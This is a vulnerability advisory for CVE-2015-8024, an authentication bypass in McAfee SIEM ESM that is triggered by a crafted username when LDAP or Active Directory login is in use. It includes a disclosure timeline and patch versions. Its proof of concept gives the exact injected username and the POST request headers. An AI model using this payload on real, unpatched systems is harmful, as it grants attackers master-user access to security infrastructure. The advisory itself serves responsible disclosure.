McAfee SIEM ESM, ESMREC, and ESMLM Authentication Bypass vulnerability


Quantum Leap Advisory McAfee SIEM ESM, ESMREC, and ESMLM Authentication Bypass vulnerability
Affected Product: SIEM ESM 9.5.0MR7, 9.4.2MR8, 9.3.2MR18 and earlier releases.
Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
CVE: CVE-2015-8024

Executive Summary

Authentication Bypass: A specially crafted username can bypass SIEM ESM authentication (password is not validated) if the ESM is configured to use Active Directory or LDAP authentication sources. This can result in the attacker gaining NGCP (master user) access to the ESM.

Proof of Concept

Authentication Bypass vulnerability has been detected on login form McAfee SIEM ESM 9.5.x and 9.4.x. For Authentication Bypass, set in login form user NGCP|NGCP|NGCP; and any password.

POST /ess HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 272

Figure 1 show example of Authentication Bypass of McAfee SIEM 9.5.0MR7.

Figure 1 – Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC


To fix the security issue we recommend to update at new version to SIEM ESM 9.5.0MR8 or 9.4.2MR9, the vendor has resolved this issue.

Disclosure Timeline

10/10/2015 – Vulnerability Discovered
13/10/2015 – Initial vendor notification
19/10/2015 – The vendor fixed the vulnerability
26/10/2015 – The vendor public Security Bulletin
02/12/2015 – CVE Assigned



L'hai trovato interessante?